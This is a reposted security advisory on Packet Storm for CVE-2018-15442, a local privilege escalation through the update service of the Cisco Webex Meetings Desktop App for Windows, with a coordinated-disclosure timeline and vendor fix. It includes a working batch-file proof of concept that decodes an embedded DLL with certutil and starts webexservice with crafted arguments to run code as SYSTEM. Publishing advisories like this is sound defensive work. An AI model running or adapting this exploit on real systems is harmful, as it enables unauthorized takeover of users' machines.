what you don't know can hurt you

Cisco WebEx Meetings Privilege Escalation

Cisco WebEx Meetings Privilege Escalation
Posted Nov 28, 2018
Authored by Core Security Technologies, Marcos Accossatto | Site coresecurity.com

A vulnerability in the update service of Cisco Webex Meetings Desktop App for Windows could allow a local attacker to elevate privileges. This vulnerability is related to a previous security issue fixed by Cisco in October. Affected versions include Cisco Webex Meetings Desktop App releases prior to 33.6.4 and Cisco Webex Productivity Tools releases 32.6.0 and later prior to 33.0.6.

tags | exploit, local
systems | cisco, windows
advisories | CVE-2018-15442
MD5 | e0df0d3b74fa1ecc2091d30eb9104327

Cisco WebEx Meetings Privilege Escalation

Change Mirror Download
SecureAuth - SecureAuth Labs Advisory
http://www.secureauth.com/

Cisco WebEx Meetings Elevation of Privilege Vulnerability

*1. *Advisory Information**

Title: Cisco WebEx Meetings Elevation of Privilege Vulnerability
Advisory ID: CORE-2018-0011
Advisory URL: http://www.secureauth.com/labs/advisories/cisco-webex-meetings-elevation-privilege-vulnerability
Date published: 2018-11-27
Date of last update: 2018-11-27
Vendors contacted: Cisco
Release mode: Coordinated release

*2. *Vulnerability Information**

Class: OS command injection [CWE-78]
Impact: Code execution
Remotely Exploitable: No
Locally Exploitable: Yes
CVE Name: CVE-2018-15442

*3. *Vulnerability Description**

Cisco's Webex Meetings website states that [1]:

Cisco Webex Meetings: Simply the Best Video Conferencing and Online
Meetings. With Cisco Webex Meetings, joining is a breeze, audio and
video are clear, and screen sharing is easier than ever. We help you
forget about the technology, to focus on what matters.

A vulnerability in the update service of Cisco Webex Meetings Desktop
App for Windows could allow a local attacker to elevate privileges. This
vulnerability is related to a previous security issue fixed by Cisco in
October.

*4. *Vulnerable Packages* *. Cisco Webex Meetings Desktop App releases prior to 33.6.4
. Cisco Webex Productivity Tools releases 32.6.0 and later prior to 33.0.6

*5. *Vendor Information, Solutions and Workarounds**

Cisco released a new fixed version and updated its security notice:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20181024-webex-injection

*6. *Credits**

This vulnerability was discovered and researched by Marcos Accossatto
from SecureAuth Exploits' Writers Team. The publication of this advisory
was coordinated by Leandro Cuozzo from SecureAuth Advisories Team.

*7. *Technical Description / Proof of Concept Code**

*7.1. *Privilege Escalation**

[CVE-2018-15442]
The update service of Cisco Webex Meetings Desktop App for Windows does
not properly validate user-supplied parameters. An unprivileged local
attacker could exploit this vulnerability by invoking the update service
command with a crafted argument. This will allow the attacker to run
arbitrary commands with SYSTEM user privileges.

The vulnerability can be exploited by copying to an a local attacker
controller folder, the ptUpdate.exe binary. Also, a malicious dll must
be placed in the same folder, named wbxtrace.dll. To gain privileges,
the attacker must start the service with the command line: sc start
webexservice install software-update 1 "attacker-controlled-path"
(if the parameter 1 doesn't work, then 2 should be used)

Proof of Concept:

/-----
REM Contents of PoC.bat
REM This batch will copy the ptUpdate.exe from the installation folder to the current folder
REM Then it will generate a simple dll that will execute notepad.exe on load. The dll will be created using certutil.exe and named wbxtrace.dll
REM Finally, the webexservice service will be started, with the showed parameters
REM The result should be a notepad.exe with SYSTEM user privileges
@echo off
:CheckOS
IF EXIST "%PROGRAMFILES(X86)%" (GOTO 64BIT) ELSE (GOTO 32BIT)

:64BIT
copy "%PROGRAMFILES(X86)%\Webex\Webex\Applications\ptUpdate.exe" .
GOTO END

:32BIT
copy "%PROGRAMFILES%\Webex\Webex\Applications\ptUpdate.exe" .
GOTO END

:END
echo TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAsAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAACVyJXZ0an7itGp+4rRqfuKLYnpitOp+4pftuiK1Kn7ilJpY2jRqfuKAAAAAAAAAABQRQAATAEEALCa5 > dll.txt
echo VsAAAAAAAAAAOAADiELAQUMAAIAAAAGAAAAAAAAABAAAAAQAAAAIAAAAAAAEAAQAAAAAgAABAAAAAQAAAAEAAAAAAAAAABQAAAABAAA3GEAAAIAAAAAABAAABAAAAAAEAAAEAAAAAAAABAAAABgIAAANQAAAAggAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> dll.txt
echo AAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC50ZXh0AAAAnQAAAAAQAAAAAgAAAAQAAAAAAAAAAAAAAAAAACAAAGAucmRhdGEAAJUAAAAAIAAAAAIAAAAGAAAAAAAAAAAAAAAAAABAAABALmRhdGEAAAAQAAAAADAAAAACAAAACAAAAAAAAAAAAAAAAAAAQAAAwC5yZWxvYwAAGAAAAABAAAA >> dll.txt
echo AAgAAAAoAAAAAAAAAAAAAAAAAAEAAAEIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> dll.txt
echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> dll.txt
echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFWL7IPErIN9DAF1NGoAakSNRbxQ6DcAAADHRbxEAAAAjUWsUI1FvFBqAGoAagBqAGoAagBoADAAEGoA6AoAAAC4AQAAAMnCDADM/yUAIAAQVYvsi1UIi0UQi00MwekFg/ >> dll.txt
echo kAdB2JAolCBIlCCIlCDIlCEIlCFIlCGIlCHIPCIEl144NlDB+DfQwAdA6LTQzB6QKJAoPCBEl1+MnCDAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> dll.txt
echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> dll.txt
echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOCAAAAAAAAAwIAAAAAAAAAAAAABKIAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOCAAAAAAAABPAENyZWF0ZVByb2Nlc3NBAABrZXJuZWwzMi5kbGwAAAAAAAAAAAAAAAAAALCa5VsAAAAAiCAAAAEAAAAAAAAAAAAAAIggAACIIAAAiCAAAHNrZWxldG9uL >> dll.txt
echo mRsbAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> dll.txt
echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABub3RlcGF >> dll.txt
echo kLmV4ZQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> dll.txt
echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> dll.txt
echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAMAAAANTBMMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> dll.txt
echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> dll.txt
echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> dll.txt
echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> dll.txt

certutil -decode dll.txt wbxtrace.dll

SET mypath=%~dp0
%mypath:~0,-1%

sc start webexservice install software-update 1 %mypath:~0,-1%
sc start webexservice install software-update 2 %mypath:~0,-1%
-----/

*8. *Report Timeline* *2018-11-09: SecureAuth sent an initial notification to the Cisco PSIRT
including a draft advisory.
2018-11-09: Cisco acknowledged the vulnerability and replied that they
were working on a fix and they were planning to release it within the
next two weeks. In addition, Cisco informed that they will update their
previous security advisory to mention that the original fix was
incomplete and to refer to the new ones fixes.
2018-11-09: SecureAuth thanked the quick response.
2018-11-19: Cisco notified that they will update the advisory on
Tuesday 27th.
2018-11-27: Advisory CORE-2018-0011 published.

*9. *References**

[1] https://www.webex.com/products/video-conferencing.html

*10. *About SecureAuth Labs**

SecureAuth Labs, the research arm of SecureAuth Corporation, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct research in several important areas of
computer security, including identity-related attacks, system
vulnerabilities and cyber-attack planning. Research includes problem
formalization, identification of vulnerabilities, novel solutions and
prototypes for new technologies. We regularly publish security
advisories, primary research, technical publications, research blogs,
project information, and shared software tools for public use at
http://www.secureauth.com.

*11. *About SecureAuth**

SecureAuth is leveraged by leading companies, their employees, their
customers and their partners to eliminate identity-related breaches.
As a leader in access management, identity governance, and penetration
testing, SecureAuth is powering an identity security revolution by
enabling people and devices to intelligently and adaptively access
systems and data, while effectively keeping bad actors from doing harm.
By ensuring the continuous assessment of risk and enablement of trust,
SecureAuth's highly flexible Identity Security Automation (ISA) platform
makes it easier for organizations to prevent the misuse of credentials
and cexponentially reduce the enterprise threat surface. To learn more,
visit www.secureauth.com, call (949) 777-6959, or email us at
info@secureauth.com

*12. *Disclaimer**

The contents of this advisory are copyright (c) 2018 bSecureAuth, and
are licensed under a Creative Commons Attribution Non-Commercial
Share-Alike 3.0 (United States) License:
http://creativecommons.org/licenses/by-nc-sa/3.0/us/

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

September 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    1 Files
  • 2
    Sep 2nd
    38 Files
  • 3
    Sep 3rd
    30 Files
  • 4
    Sep 4th
    15 Files
  • 5
    Sep 5th
    12 Files
  • 6
    Sep 6th
    17 Files
  • 7
    Sep 7th
    3 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    24 Files
  • 10
    Sep 10th
    22 Files
  • 11
    Sep 11th
    22 Files
  • 12
    Sep 12th
    15 Files
  • 13
    Sep 13th
    5 Files
  • 14
    Sep 14th
    2 Files
  • 15
    Sep 15th
    1 Files
  • 16
    Sep 16th
    11 Files
  • 17
    Sep 17th
    14 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close